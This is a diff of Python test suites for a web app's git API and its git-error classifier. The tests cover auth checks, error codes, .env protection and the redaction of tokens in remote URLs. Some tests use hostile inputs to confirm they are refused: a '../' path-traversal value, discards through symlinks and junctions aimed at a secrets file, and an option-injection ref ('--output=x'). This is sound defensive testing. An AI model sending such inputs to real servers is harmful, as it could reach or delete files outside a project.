+    None of these routes declares an auth dependency of its own -- they are
+    covered by ``auth_guard`` for being POSTs and PUTs under ``/api/`` --
+    which is exactly why this asks the app rather than reading the code.
+    """
+    mutating = [
+        (method, route.path)
+        for route in routes_git.router.routes
+        if isinstance(route, APIRoute)
+        for method in sorted(route.methods)
+        if method not in {"GET", "HEAD", "OPTIONS"}
+    ]
+    assert len(mutating) >= 6, "router walk is broken"
+
+    for method, path in mutating:
+        response = await anon_client.request(method, path, json={})
+        assert response.status_code == 403, f"{method} {path}"
+        assert TOKEN_HEADER in response.json()["detail"]
+
+
+async def test_the_reads_are_open_gets(anon_client, project):
+    """The tab polls the status before it has a token, like every other
+    read in the app."""
+    response = await anon_client.get("/api/git/status")
+
+    assert response.status_code == 200, response.text
+    assert response.json()["repo"]["state"] == "ready"
+
+
+async def test_the_git_router_is_not_auth_exempt():
+    """An exemption would silently drop authentication from every write:
+    the exempt prefixes owe a route-level dependency instead, and these
+    routes have none. ``test_auth_drift.py`` pins the pair itself."""
+    assert "/api/git" not in _AUTH_EXEMPT_PREFIXES
+    assert not _prefix_exempt("/api/git")
+    assert not _prefix_exempt("/api/git/commit")
+
+
+async def test_there_is_no_loopback_gate(test_client, project, monkeypatch):
+    """Deliberate, and the opposite of the Package Center: this runs the
+    user's own git in the directory they opened, and access control for a
+    server somebody deliberately serves to a LAN is IT's job (#247)."""
+    monkeypatch.setattr(settings, "HOST", "192.168.1.20")
+    project.write("new.txt", "new\n")
+
+    response = await test_client.post("/api/git/stage", json={"all": True})
+
+    assert response.status_code == 200, response.text
+
+
+# --- the failures, as codes --------------------------------------------------
+
+
+async def test_a_path_that_leaves_the_project_is_400_invalid_path(test_client,
+                                                                  project):
+    response = await test_client.post("/api/git/discard",
+                                      json={"paths": ["../outside.txt"]})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_path"
+
+
+async def test_an_unknown_commit_is_404_not_found(test_client, project):
+    """Well-shaped and not there -- which is a different answer from a sha
+    that is not a sha at all."""
+    response = await test_client.get(f"/api/git/commits/{'0' * 40}/files")
+
+    assert response.status_code == 404
+    assert (await _detail(response))["code"] == "not_found"
+
+
+async def test_a_sha_that_is_not_a_sha_is_400_invalid_ref(test_client,
+                                                          project):
+    response = await test_client.get("/api/git/commits/HEAD~3/files")
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_ref"
+
+
+async def test_an_empty_commit_message_is_400_invalid_value(test_client,
+                                                            project):
+    """Refused as a code, not as pydantic's English: the message is a plain
+    ``str`` on the wire for exactly this reason."""
+    project.write("a.txt", "one\nedited\n")
+    await test_client.post("/api/git/stage", json={"all": True})
+
+    response = await test_client.post("/api/git/commit", json={"message": "  "})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_value"
+
+
+async def test_a_commit_with_nothing_staged_is_409_nothing_to_commit(
+        test_client, project):
+    response = await test_client.post("/api/git/commit",
+                                      json={"message": "nothing"})
+
+    assert response.status_code == 409
+    assert (await _detail(response))["code"] == "nothing_to_commit"
+
+
+@pytest.mark.parametrize("path", [".env", ".env.local", "config/.env"])
+async def test_a_dotenv_diff_is_403_ignored(test_client, project, path):
+    """At ANY ref and whatever is on disk: a ``.env`` committed once is in
+    every later tree, and this is an open GET."""
+    response = await test_client.get(
+        "/api/git/diff", params={"path": path, "scope": "worktree"})
+
+    assert response.status_code == 403
+    detail = await _detail(response)
+    assert detail["code"] == "ignored"
+    assert detail["hint"]
+
+
+async def test_a_dotenv_file_read_is_403_at_head_too(test_client, project):
+    project.write(".env", f"{SECRET}\n")
+
+    response = await test_client.get(
+        "/api/git/file", params={"path": ".env", "ref": "worktree"})
+
+    assert response.status_code == 403
+    assert (await _detail(response))["code"] == "ignored"
+    assert SECRET not in response.text
+
+
+async def test_a_second_write_while_one_runs_is_409_busy(test_client, project):
+    """The lock is the whole reason the service exists, and the refusal
+    names the operation holding it so the tab can say which."""
+    service = app.state.git_service
+    async with service.lock:
+        service.current_op = "commit"
+        response = await test_client.post("/api/git/stage", json={"all": True})
+    service.current_op = None
+
+    assert response.status_code == 409
+    detail = await _detail(response)
+    assert detail["code"] == "busy"
+    assert detail["op"] == "commit"
+
+
+async def test_a_read_does_not_queue_behind_a_running_write(test_client,
+                                                            project):
+    """A status poll must not stall while a commit runs the user's hooks."""
+    service = app.state.git_service
+    async with service.lock:
+        service.current_op = "commit"
+        response = await test_client.get("/api/git/status")
+    service.current_op = None
+
+    assert response.status_code == 200, response.text
+    assert response.json()["repo"]["state"] == "ready"
+
+
+async def test_a_server_without_the_service_answers_503(test_client,
+                                                        monkeypatch):
+    """The lifespan builds it; a server whose startup failed has no
+    repository to talk about either."""
+    monkeypatch.delattr(app.state, "git_service", raising=False)
+
+    read = await test_client.get("/api/git/status")
+    write = await test_client.post("/api/git/init", json={})
+
+    assert read.status_code == 503
+    assert write.status_code == 503
+    assert (await _detail(read))["code"] == "git_service_unavailable"
+    assert (await _detail(write))["code"] == "git_service_unavailable"
+
+
+# --- what the query string may say -------------------------------------------
+
+
+@pytest.mark.parametrize("limit", [0, 101, -1])
+async def test_a_page_size_out_of_range_is_422(test_client, project, limit):
+    """Enforced by the signature, so it costs no code here and no process."""
+    response = await test_client.get("/api/git/log", params={"limit": limit})
+
+    assert response.status_code == 422
+
+
+async def test_the_page_size_bounds_themselves_are_allowed(test_client,
+                                                           project):
+    for limit in (1, 100):
+        response = await test_client.get("/api/git/log",
+                                         params={"limit": limit})
+        assert response.status_code == 200, response.text
+
+
+async def test_a_negative_skip_is_422(test_client, project):
+    response = await test_client.get("/api/git/log", params={"skip": -1})
+
+    assert response.status_code == 422
+
+
+async def test_a_commit_diff_without_a_commit_is_400_invalid_value(test_client,
+                                                                   project):
+    response = await test_client.get(
+        "/api/git/diff", params={"path": "a.txt", "scope": "commit"})
+
+    assert response.status_code == 400
+    detail = await _detail(response)
+    assert detail["code"] == "invalid_value"
+    assert detail["hint"]
+
+
+async def test_an_empty_sha_reads_as_no_sha(test_client, project):
+    """The tab builds this query from one form whose fields are always
+    present, so ``sha=`` is what "no commit" looks like on the wire."""
+    response = await test_client.get(
+        "/api/git/diff",
+        params={"path": "a.txt", "scope": "commit", "sha": ""})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_value"
+
+
+async def test_a_worktree_diff_carrying_a_sha_is_400(test_client, project):
+    """Silently ignoring it would show the user a diff of something else."""
+    response = await test_client.get(
+        "/api/git/diff",
+        params={"path": "a.txt", "scope": "worktree",
+                "sha": project.head()})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_value"
+
+
+async def test_an_unknown_diff_scope_is_422(test_client, project):
+    response = await test_client.get(
+        "/api/git/diff", params={"path": "a.txt", "scope": "everything"})
+
+    assert response.status_code == 422
+
+
+@pytest.mark.parametrize("body", [
+    pytest.param({}, id="neither"),
+    pytest.param({"paths": []}, id="an-empty-selection"),
+    pytest.param({"paths": ["a.txt"], "all": True}, id="both"),
+    pytest.param({"all": True, "force": True}, id="a-key-nobody-defined"),
+])
+async def test_a_selection_that_is_not_one_of_the_two_forms_is_422(
+        test_client, project, body):
+    """``add -A --`` with an empty pathspec stages the WHOLE tree, so
+    "nothing was selected" must never be able to become "all" further
+    down."""
+    response = await test_client.post("/api/git/stage", json=body)
+
+    assert response.status_code == 422
+
+
+async def test_an_identity_write_with_neither_half_is_400(test_client,
+                                                          project):
+    response = await test_client.put("/api/git/config", json={})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_value"
+
+
+async def test_an_email_without_an_at_sign_is_400(test_client, project):
+    response = await test_client.put("/api/git/config",
+                                     json={"email": "grace"})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_value"
+
+
+# --- nothing in the envelope is a credential ---------------------------------
+
+
+async def test_the_envelope_never_carries_a_credential(test_client, project,
+                                                       monkeypatch):
+    """The one failure most likely to hold a working token.
+
+    ``auth_required`` is raised with git's own stderr attached, and a URL
+    somebody pasted into ``git remote add`` can carry the token inside it.
+    The service is made to raise exactly that, because the alternative is a
+    test that needs a real remote and a real credential.
+    """
+    async def refuse(**_kwargs):
+        raise GitError(
+            "auth_required", 409,
+            f"unable to access 'https://octocat:{TOKEN}@github.com/o/r/'",
+            hint=f"the remote is https://octocat:{TOKEN}@github.com/o/r/",
+            stderr=f"fatal: unable to access 'https://x-access-token:{TOKEN}"
+                   "@github.com/o/r/': The requested URL returned error: 403")
+
+    monkeypatch.setattr(app.state.git_service, "log", refuse)
+
+    response = await test_client.get("/api/git/log")
+
+    assert response.status_code == 409
+    detail = await _detail(response)
+    assert detail["code"] == "auth_required"
+    # The whole body, not only the field the leak was expected in.
+    assert TOKEN not in response.text
+    # And what is KEPT: which remote failed, and what git said about it.
+    assert "github.com/o/r/" in detail["message"]
+    assert "The requested URL returned error: 403" in detail["stderr"]
+    assert "github.com/o/r/" in detail["hint"]
+
+
+# --- a write may not travel through a link -----------------------------------
+
+
+async def test_a_discard_through_a_link_is_refused_end_to_end(test_client,
+                                                              project):
+    """Measured before the guard existed: this deleted the real file.
+
+    The link points INSIDE the project, so the containment check that would
+    have caught one pointing out of it passes, and ``clean -f`` down it
+    removed ``secrets/keys.txt``. Through the route, because that is the
+    path a browser can actually take.
+    """
+    project.write("secrets/keys.txt", f"{SECRET}\n")
+    _link_or_skip(project.root / "secrets", project.root / "notes")
+
+    response = await test_client.post("/api/git/discard",
+                                      json={"paths": ["notes/keys.txt"]})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_path"
+    assert (project.root / "secrets" / "keys.txt").read_text(
+        encoding="utf-8") == f"{SECRET}\n"
+
+
+@pytest.mark.skipif(sys.platform != "win32", reason="junctions are Windows'")
+async def test_a_discard_through_a_junction_is_refused_end_to_end(test_client,
+                                                                  project):
+    """A junction is not a symbolic link and ``is_symlink`` cannot see it."""
+    import subprocess
+
+    project.write("secrets/keys.txt", f"{SECRET}\n")
+    made = subprocess.run(
+        ["cmd", "/c", "mklink", "/J", str(project.root / "notes"),
+         str(project.root / "secrets")], capture_output=True)
+    if made.returncode != 0:
+        pytest.skip("this box would not create a junction")
+
+    response = await test_client.post("/api/git/discard",
+                                      json={"paths": ["notes/keys.txt"]})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_path"
+    assert (project.root / "secrets" / "keys.txt").exists()
+
+
+# --- the whole thing, once ---------------------------------------------------
+
+
+async def test_init_stage_commit_log_and_diff_over_http(test_client,
+                                                        empty_project):
+    """One pass through the tab's whole first session, over the wire.
+
+    Every step is a route, and every assertion is on what a browser would
+    have received: the panel after the init, the sha the commit answers
+    with, the history that then has one row, and the patch of that commit
+    holding the content that was written to disk.
+    """
+    root = empty_project
+
+    created = await test_client.post("/api/git/init", json={})
+    assert created.status_code == 200, created.text
+    assert created.json()["status"]["unborn"] is True
+    assert set(created.json()["detail"]["scaffold"]) == {".gitignore",
+                                                         ".gitattributes"}
+    assert (root / ".git").is_dir()
+
+    (root / "hello.txt").write_bytes(b"one\ntwo\n")
+
+    staged = await test_client.post("/api/git/stage",
+                                    json={"paths": ["hello.txt"]})
+    assert staged.status_code == 200, staged.text
+    assert [entry["path"] for entry in staged.json()["status"]["staged"]] == [
+        "hello.txt"]
+
+    committed = await test_client.post("/api/git/commit",
+                                       json={"message": "first commit"})
+    assert committed.status_code == 200, committed.text
+    sha = committed.json()["detail"]["sha"]
+    assert committed.json()["detail"]["short"] == sha[:7]
+    assert committed.json()["head"] == sha
+    assert committed.json()["status"]["staged"] == []
+
+    history = await test_client.get("/api/git/log")
+    assert history.status_code == 200, history.text
+    assert [row["sha"] for row in history.json()["commits"]] == [sha]
+    assert history.json()["commits"][0]["subject"] == "first commit"
+
+    # Only what was staged: the scaffold this init wrote is still untracked,
+    # which is what makes this a commit of one file and not of three.
+    files = await test_client.get(f"/api/git/commits/{sha}/files")
+    assert [row["path"] for row in files.json()] == ["hello.txt"]
+
+    patch = await test_client.get(
+        "/api/git/diff",
+        params={"path": "hello.txt", "scope": "commit", "sha": sha})
+    assert patch.status_code == 200, patch.text
+    assert "+one" in patch.json()["patch"]
+    assert patch.json()["new_ref"] == sha
+
+    final = await test_client.get("/api/git/status")
+    assert final.json()["repo"]["state"] == "ready"
+    assert final.json()["status"]["head"] == sha
+    assert final.json()["status"]["unborn"] is False

--- a/backend/tests/test_api_git.py
+++ b/backend/tests/test_api_git.py
@@ -254,6 +254,37 @@ async def test_a_file_at_a_ref_is_file_at_ref_shaped(test_client, project):
     assert body["binary"] is False
 
 
+@pytest.mark.parametrize("ref", ["HEAD", "index", "worktree"])
+async def test_a_file_reads_at_every_named_ref(test_client, project, ref):
+    """Three readers underneath -- the object database twice and the
+    filesystem once -- behind one route and one shape."""
+    response = await test_client.get("/api/git/file",
+                                     params={"path": "a.txt", "ref": ref})
+
+    assert response.status_code == 200, response.text
+    assert response.json()["text"] == "one\ntwo\n"
+
+
+async def test_a_file_reads_at_a_commit_id(test_client, project):
+    """The fourth form of ``ref``: not a name, a sha."""
+    response = await test_client.get(
+        "/api/git/file", params={"path": "a.txt", "ref": project.head()})
+
+    assert response.status_code == 200, response.text
+    assert response.json()["text"] == "one\ntwo\n"
+
+
+async def test_a_ref_that_is_neither_a_name_nor_a_sha_is_400(test_client,
+                                                             project):
+    """``HEAD~3`` and ``--output=x`` are the same refusal: the grammar is
+    closed, and a ref never reaches an argument list unchecked."""
+    response = await test_client.get("/api/git/file",
+                                     params={"path": "a.txt", "ref": "banana"})
+
+    assert response.status_code == 400
+    assert (await _detail(response))["code"] == "invalid_ref"
+
+
 async def test_a_write_answers_with_the_status_it_left_behind(test_client,
                                                               project):
     """Every mutation carries a fresh status, so the tab never draws a
@@ -308,6 +339,19 @@ async def test_the_identity_reads_and_writes_with_its_scope(test_client,
     # machine's global config from a web request.
     assert body["name_scope"] == "local"
     assert body["email_scope"] == "local"
+
+
+async def test_an_identity_write_may_set_one_half(test_client, project):
+    """A name without an email means what it says, and the answer is the
+    identity as it now READS -- half of it still unset."""
+    response = await test_client.put("/api/git/config", json={"name": "Ada"})
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["name"] == "Ada"
+    assert body["name_scope"] == "local"
+    assert body["email"] is None
+    assert body["email_scope"] is None
 
 
 # --- "no project open" is a screen, not an error -----------------------------
@@ -697,6 +741,15 @@ async def test_a_discard_through_a_junction_is_refused_end_to_end(test_client,
 
 
 # --- the whole thing, once ---------------------------------------------------
+
+
+async def test_init_needs_no_body_at_all(test_client, empty_project):
+    """There is nothing to choose, so there is nothing to send -- and a
+    client that sends an empty object anyway is not corrected for it."""
+    response = await test_client.post("/api/git/init")
+
+    assert response.status_code == 200, response.text
+    assert (empty_project / ".git").is_dir()
 
 
 async def test_init_stage_commit_log_and_diff_over_http(test_client,

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -181,6 +181,12 @@ _SAMPLES = [
     pytest.param(
         "error: could not lock config file .git/config: File exists\n",
         "git_failed", id="unrecognised"),
+    pytest.param(
+        # INDENTED, so it is not git's own sentence: git never indents a
+        # ``fatal:``, and a hook that pretty-prints its output would
+        # otherwise get to choose the code the user is shown.
+        "    fatal: config not found\n",
+        "git_failed", id="an-indented-fatal-is-hook-prose"),
 ]
 
 _ARGV = ["git", "-C", "/p", "-c", "core.quotepath=false", "-c",
@@ -526,6 +532,26 @@ def test_the_mask_never_runs_past_the_authority():
     assert redact("https://a:pw@h/x@y") == "https://***@h/x@y"
     assert redact("https://a:p@w@h/x https://b:p@w@h/y") == (
         "https://***@h/x https://***@h/y")
+
+
+def test_a_classified_failure_is_already_redacted():
+    """The mask runs here too, not only on the way out of a route.
+
+    A route is still what decides what reaches a browser -- but a credential
+    that was never put INTO the exception cannot escape through a log line,
+    a test fixture, or the next caller somebody writes. Redaction is
+    idempotent, so the second pass at the route costs nothing.
+    """
+    error = classify_failure(
+        _ARGV, 128,
+        f"fatal: unable to access 'https://octocat:{TOKEN}@github.com/o/r/': "
+        "The requested URL returned error: 403\n")
+
+    assert error.code == "auth_required"
+    assert error.stderr is not None
+    assert TOKEN not in error.stderr
+    # And the half that makes it actionable is still there.
+    assert "github.com/o/r/" in error.stderr
 
 
 def test_redaction_survives_the_empty_string():

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -1,0 +1,299 @@
+"""Turning git's prose into a code the Source Control tab can act on.
+
+The tab is used by people who may not read English, so nothing git prints
+is ever shown to them directly: every failure becomes a ``code`` the
+frontend translates. That makes the classifier a piece of user-facing
+behaviour, and it fails quietly -- a mis-read stderr does not raise, it
+tells the user the wrong thing to do next ("log in" for a network outage,
+"retry" for a wrong password).
+
+So every row of the table gets a test with real git output, and the two
+rows whose ORDER is the only thing keeping them apart -- auth before
+network, both of which an ssh failure ends with the same line -- get one
+each in both directions.
+"""
+
+from __future__ import annotations
+
+import pytest
+
+from app.core.git.errors import (
+    CODES,
+    LAST_STDERR_LINES,
+    GitBusy,
+    GitError,
+    classify_failure,
+    default_message,
+    stderr_tail,
+)
+
+#: The whole vocabulary, written out again here rather than derived from
+#: ``CODES``: this is the list from the G1 plan, and a test that read the
+#: table it is checking would pass no matter what the table said.
+_PLANNED_CODES = {
+    "no_project", "git_missing", "git_too_old", "not_repo", "busy", "timeout",
+    "auth_required", "network", "non_fast_forward", "diverged", "conflict",
+    "dirty_tree", "no_upstream", "no_remote", "nothing_to_commit",
+    "identity_missing", "detached_head", "merge_in_progress", "branch_exists",
+    "branch_not_merged", "signing_failed", "not_found", "invalid_path",
+    "invalid_ref", "invalid_url", "invalid_value", "path_not_in_status",
+    "ignored", "git_failed",
+}
+
+#: One representative stderr per classified row, as git prints it under
+#: ``LC_ALL=C``. The two ssh cases are the split described in the module
+#: docstring: same last line, opposite meanings.
+_SAMPLES = [
+    pytest.param(
+        "fatal: could not read Username for 'https://github.com': "
+        "terminal prompts disabled\n",
+        "auth_required", id="prompts-disabled"),
+    pytest.param(
+        "remote: Invalid username or token. Password authentication is not "
+        "supported.\nfatal: Authentication failed for 'https://github.com/a/b/'\n",
+        "auth_required", id="wrong-token"),
+    pytest.param(
+        "fatal: unable to access 'https://github.com/a/b/': "
+        "The requested URL returned error: 403\n",
+        "auth_required", id="http-403"),
+    pytest.param(
+        "git@github.com: Permission denied (publickey).\n"
+        "fatal: Could not read from remote repository.\n\n"
+        "Please make sure you have the correct access rights\n",
+        "auth_required", id="ssh-key-refused"),
+    pytest.param(
+        "Host key verification failed.\n"
+        "fatal: Could not read from remote repository.\n",
+        "auth_required", id="ssh-host-key"),
+    pytest.param(
+        # A server that offers password auth first: ssh's method list is in
+        # the SERVER's order, so the exact "(publickey" phrase is absent and
+        # only the pairing with the remote-read line classifies this.
+        "git@example.com: Permission denied (password,publickey).\n"
+        "fatal: Could not read from remote repository.\n",
+        "auth_required", id="ssh-password-first"),
+    pytest.param(
+        "ssh: connect to host github.com port 22: Connection timed out\n"
+        "fatal: Could not read from remote repository.\n",
+        "network", id="ssh-unreachable"),
+    pytest.param(
+        "fatal: unable to access 'https://github.com/a/b/': "
+        "Could not resolve host: github.com\n",
+        "network", id="dns"),
+    pytest.param(
+        " ! [rejected]        main -> main (fetch first)\n"
+        "error: failed to push some refs to 'https://github.com/a/b'\n"
+        "hint: Updates were rejected because the remote contains work that you\n",
+        "non_fast_forward", id="push-rejected"),
+    pytest.param(
+        " ! [rejected]        main -> main (non-fast-forward)\n",
+        "non_fast_forward", id="push-non-ff"),
+    pytest.param(
+        "fatal: Need to specify how to reconcile divergent branches.\n",
+        "diverged", id="pull-divergent"),
+    pytest.param(
+        "fatal: Not possible to fast-forward, aborting.\n",
+        "diverged", id="ff-only"),
+    pytest.param(
+        "Auto-merging a.txt\nCONFLICT (content): Merge conflict in a.txt\n"
+        "Automatic merge failed; fix conflicts and then commit the result.\n",
+        "conflict", id="merge-conflict"),
+    pytest.param(
+        "error: Your local changes to the following files would be "
+        "overwritten by merge:\n\ta.txt\n"
+        "Please commit your changes or stash them before you merge.\n"
+        "Aborting\n",
+        "dirty_tree", id="dirty-tree"),
+    pytest.param(
+        "fatal: The current branch feat has no upstream branch.\n",
+        "no_upstream", id="no-upstream"),
+    pytest.param(
+        "There is no tracking information for the current branch.\n",
+        "no_upstream", id="no-tracking"),
+    pytest.param(
+        'no changes added to commit (use "git add" and/or "git commit -a")\n',
+        "nothing_to_commit", id="nothing-staged"),
+    pytest.param(
+        "Author identity unknown\n\n*** Please tell me who you are.\n"
+        "fatal: unable to auto-detect email address\n",
+        "identity_missing", id="no-identity"),
+    pytest.param(
+        "fatal: You are not currently on a branch.\n",
+        "detached_head", id="detached"),
+    pytest.param(
+        "fatal: a branch named 'feat' already exists\n",
+        "branch_exists", id="branch-exists"),
+    pytest.param(
+        "error: the branch 'feat' is not fully merged\n",
+        "branch_not_merged", id="branch-not-merged"),
+    pytest.param(
+        "error: gpg failed to sign the data\n"
+        "fatal: failed to write commit object\n",
+        "signing_failed", id="signing"),
+    pytest.param(
+        "error: pathspec 'nope.txt' did not match any file(s) known to git\n",
+        "not_found", id="bad-pathspec"),
+    pytest.param(
+        "fatal: ambiguous argument 'deadbee': unknown revision or path not in "
+        "the working tree.\n",
+        "not_found", id="unknown-revision"),
+    pytest.param(
+        "fatal: bad revision 'refs/heads/gone'\n",
+        "not_found", id="bad-revision"),
+    pytest.param(
+        "error: could not lock config file .git/config: File exists\n",
+        "git_failed", id="unrecognised"),
+]
+
+_ARGV = ["git", "-C", "/p", "-c", "core.quotepath=false", "-c",
+         "core.askPass=", "-c", "color.ui=never", "push", "origin", "main"]
+
+
+@pytest.mark.parametrize("stderr,code", _SAMPLES)
+def test_classification(stderr, code):
+    """Real git output lands on the row the plan says it lands on."""
+    error = classify_failure(_ARGV, 128, stderr)
+
+    assert error.code == code
+    assert error.status == CODES[code][0]
+
+
+def test_the_ssh_split_is_the_row_order():
+    """Both ssh failures end with the same line; only the line ABOVE it says
+    which one it was, so the auth row has to be tried first."""
+    tail = "fatal: Could not read from remote repository.\n"
+
+    refused = classify_failure(_ARGV, 128, "Permission denied (publickey).\n" + tail)
+    unreachable = classify_failure(_ARGV, 128,
+                                   "ssh: connect to host h port 22: "
+                                   "Connection refused\n" + tail)
+    bare = classify_failure(_ARGV, 128, tail)
+
+    assert refused.code == "auth_required"
+    assert unreachable.code == "network"
+    # Nothing explains it: the remote could not be read, and that is all we
+    # can honestly say.
+    assert bare.code == "network"
+
+
+@pytest.mark.parametrize("line", [
+    "fatal: could not read Username for 'https://github.com': "
+    "terminal prompts disabled",
+    "fatal: could not read Password for 'https://u@github.com': "
+    "No such device or address",
+    "fatal: Authentication failed for 'https://github.com/a/b/'",
+    "remote: HTTP Basic: Access denied",
+    "remote: Invalid username or password.",
+    # No "Could not read from remote repository" line under it: the phrase
+    # has to be enough on its own, because a wrapper (or a future git) may
+    # not print git's own summary line.
+    "git@github.com: Permission denied (publickey).",
+    "Host key verification failed.",
+    "fatal: unable to access 'https://github.com/a/b/': "
+    "The requested URL returned error: 401",
+])
+def test_a_credential_phrase_is_enough_on_its_own(line):
+    """Each phrase classifies by itself -- the row is an OR, not a recipe."""
+    assert classify_failure(_ARGV, 128, line + "\n").code == "auth_required"
+
+
+def test_a_local_permission_error_is_not_a_login_problem():
+    """"Permission denied" on a lock file is not "your key was refused" --
+    the auth row pairs it with the remote-read line for exactly this."""
+    error = classify_failure(
+        _ARGV, 128,
+        "error: open('.git/index.lock'): Permission denied\n")
+
+    assert error.code == "git_failed"
+
+
+def test_an_unrecognised_failure_keeps_the_tail_of_stderr():
+    """The only code that hands the raw text on: there is nothing else to
+    go on, and the last lines are where git puts the reason."""
+    stderr = "\n".join(f"line {n}" for n in range(50)) + "\n"
+
+    error = classify_failure(_ARGV, 1, stderr)
+
+    assert error.code == "git_failed"
+    assert error.status == 500
+    assert error.stderr is not None
+    assert error.stderr.splitlines() == [
+        f"line {n}" for n in range(50 - LAST_STDERR_LINES, 50)]
+
+
+def test_a_classified_failure_does_not_leak_stderr():
+    """A code the frontend can translate needs no raw English attached."""
+    error = classify_failure(_ARGV, 128, "fatal: Authentication failed for 'x'\n")
+
+    assert error.stderr is None
+
+
+def test_the_failing_subcommand_is_named():
+    """The message is for a log, and a log line without the subcommand is a
+    line nobody can place. The fixed prefix must not be mistaken for it."""
+    error = classify_failure(_ARGV, 1, "error: unrecognised\n")
+
+    assert "push" in error.message
+    assert "core.quotepath" not in error.message
+
+
+def test_a_command_that_is_all_options_still_has_a_message():
+    """No subcommand to name, and no "git  failed" with a hole in it."""
+    error = classify_failure(["git", "--version"], 1, "boom\n")
+
+    assert error.message == "git failed (exit 1)"
+
+
+def test_stderr_tail_drops_the_trailing_blank_lines():
+    assert stderr_tail("a\nb\n\n\n") == "a\nb"
+    assert stderr_tail("a\nb\nc\n", limit=2) == "b\nc"
+
+
+# --- the vocabulary --------------------------------------------------------
+
+
+def test_every_planned_code_exists():
+    """The table in the plan and the table in the code are the same table."""
+    assert set(CODES) == _PLANNED_CODES
+
+
+def test_every_code_has_a_plausible_status():
+    assert all(400 <= status <= 599 for status, _ in CODES.values())
+
+
+def test_every_message_is_plain_ascii():
+    """No translated prose in core: the frontend translates the CODE, and a
+    second translation here would be one nobody maintains. (Also the reason
+    the whole backend stays ASCII -- a cp950 console cannot print the rest.)"""
+    for code, (_, message) in CODES.items():
+        assert message.isascii(), code
+        assert message == message.strip()
+
+
+def test_default_message_survives_an_unknown_code():
+    """An unknown code must not be a KeyError in an error path."""
+    assert default_message("something_new") == "something_new"
+
+
+def test_git_error_carries_what_a_route_needs():
+    error = GitError("not_found", 404, "no such commit", hint="try HEAD",
+                     stderr="fatal: bad object")
+
+    assert (error.code, error.status) == ("not_found", 404)
+    assert error.message == "no such commit"
+    assert error.hint == "try HEAD"
+    assert str(error) == "no such commit"
+
+
+def test_git_error_falls_back_to_the_tables_message():
+    assert GitError("not_repo", 409).message == CODES["not_repo"][1]
+
+
+def test_git_busy_names_the_operation_that_holds_the_lock():
+    """A caller that catches this says "wait for X", not "busy"."""
+    busy = GitBusy("commit")
+
+    assert isinstance(busy, GitError)
+    assert (busy.code, busy.status) == ("busy", 409)
+    assert busy.op == "commit"
+    assert "commit" in busy.message

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -232,6 +232,27 @@ def test_either_way_of_saying_nothing_to_commit_is_enough(line):
     assert classify_failure(_ARGV, 1, line + "\n").code == "nothing_to_commit"
 
 
+def test_untracked_files_only_is_also_nothing_to_commit():
+    """git's third phrasing, and the one it shares no words with the others.
+
+    A repository whose only changes are new files answers a commit with
+    "nothing ADDED to commit" -- which contains neither "nothing to commit"
+    nor "no changes added to commit". It is the most ordinary empty commit
+    there is (a first commit where nobody staged anything), and without its
+    own phrase it was a 500. Measured against git 2.53, on stdout, exit 1.
+    """
+    stdout = (
+        "On branch main\n"
+        "Untracked files:\n"
+        '  (use "git add <file>..." to include in what will be committed)\n'
+        "\tnew.py\n"
+        "\n"
+        'nothing added to commit but untracked files present (use "git add" '
+        "to track)\n")
+
+    assert classify_failure(_ARGV, 1, stdout).code == "nothing_to_commit"
+
+
 def test_a_local_permission_error_is_not_a_login_problem():
     """"Permission denied" on a lock file is not "your key was refused" --
     the auth row pairs it with the remote-read line for exactly this."""
@@ -293,6 +314,14 @@ def test_stderr_that_says_nothing_is_reported_as_nothing():
                  id="hook-missing-venv"),
     pytest.param("error: cannot lock ref: reference already exists\n",
                  id="not-a-branch-that-exists"),
+    # TWO lines, and the anchored one comes first: this is what a real
+    # failing hook looks like, and it pins the anchor to the LINE rather
+    # than to the stream. A matcher that searched the whole text would find
+    # "not found" on the second line, next to a "fatal: " on the first, and
+    # answer "git found no such object" for a missing linter.
+    pytest.param("fatal: cannot run .git/hooks/pre-commit: No such file or "
+                 "directory\nruff: command not found\n",
+                 id="hook-that-could-not-be-run"),
 ])
 def test_a_failing_hook_is_not_a_missing_object(stderr):
     """``commit`` runs the user's hooks, and their output lands on this same

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -99,6 +99,20 @@ _SAMPLES = [
         "Auto-merging a.txt\nCONFLICT (content): Merge conflict in a.txt\n"
         "Automatic merge failed; fix conflicts and then commit the result.\n",
         "conflict", id="merge-conflict"),
+    # The OTHER moment a conflict is reported: ``git commit`` refusing to
+    # run while the index still holds an unmerged path. Copied off git 2.53
+    # (exit 128); it shares no phrase with the merge-time lines above.
+    pytest.param(
+        "error: Committing is not possible because you have unmerged files.\n"
+        "hint: Fix them up in the work tree, and then use 'git add/rm <file>'\n"
+        "hint: as appropriate to mark resolution and make a commit.\n"
+        "fatal: Exiting because of an unresolved conflict.\n",
+        "conflict", id="commit-blocked-by-a-conflict"),
+    pytest.param(
+        # The fatal line on its own: a wrapper (or a future git) may print
+        # only its own summary, so each phrase has to be enough by itself.
+        "fatal: Exiting because of an unresolved conflict.\n",
+        "conflict", id="unresolved-conflict-alone"),
     pytest.param(
         "error: Your local changes to the following files would be "
         "overwritten by merge:\n\ta.txt\n"

--- a/backend/tests/test_git_errors.py
+++ b/backend/tests/test_git_errors.py
@@ -24,6 +24,7 @@ from app.core.git.errors import (
     GitError,
     classify_failure,
     default_message,
+    redact,
     stderr_tail,
 )
 
@@ -419,3 +420,76 @@ def test_git_busy_names_the_operation_that_holds_the_lock():
     assert (busy.code, busy.status) == ("busy", 409)
     assert busy.op == "commit"
     assert "commit" in busy.message
+
+
+# --- what leaves the server -------------------------------------------------
+
+
+#: A token that is obviously one, so a failing assertion below says which
+#: string escaped rather than pointing at a plausible-looking word.
